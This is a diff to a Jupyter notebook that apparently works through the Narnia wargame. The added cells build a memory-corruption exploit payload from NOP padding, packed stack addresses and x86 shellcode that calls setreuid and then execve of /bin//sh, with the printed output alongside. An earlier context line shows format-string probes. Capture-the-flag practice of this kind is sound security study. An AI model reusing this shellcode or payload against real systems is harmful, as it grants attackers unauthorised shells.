--- a/Narnia/narnia.ipynb
+++ b/Narnia/narnia.ipynb
@@ -75,6 +75,56 @@
     "for i in range(64):\n",
     "    print(f\"%{i}$x\")"
    ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'\\xa6\\xd5\\xff\\xff'\n",
+      "b'\\x8a\\xd5\\xff\\xff'\n",
+      "b'\\x97O\\xfc\\xf7'\n",
+      "b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x8a\\xd5\\xff\\xff\\x97O\\xfc\\xf7\\x97O\\xfc\\xf7j1X\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1jFX\\xcd\\x80\\xb0\\x0bRhn/shh//bi\\x89\\xe3\\x89\\xd1\\xcd\\x80'\n"
+     ]
+    }
+   ],
+   "source": [
+    "padding = b\"\\x90\" * 20\n",
+    "blah = struct.pack(\"<I\", 0xFFFFD58A)\n",
+    "target = struct.pack(\"<I\", 0xFFFFD58A + len(padding) + len(blah) * 2)\n",
+    "print(target)\n",
+    "target = struct.pack(\"<I\", 0xF7FC4F97)\n",
+    "shellcode = b\"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\\xcd\\x80\"\n",
+    "\n",
+    "payload = padding + blah + target * 2 + shellcode\n",
+    "print(blah)\n",
+    "print(target)\n",
+    "print(payload)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "594"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "0xFFFFD5A6 - 0xFFFFD354"
+   ]
   }
  ],
  "metadata": {
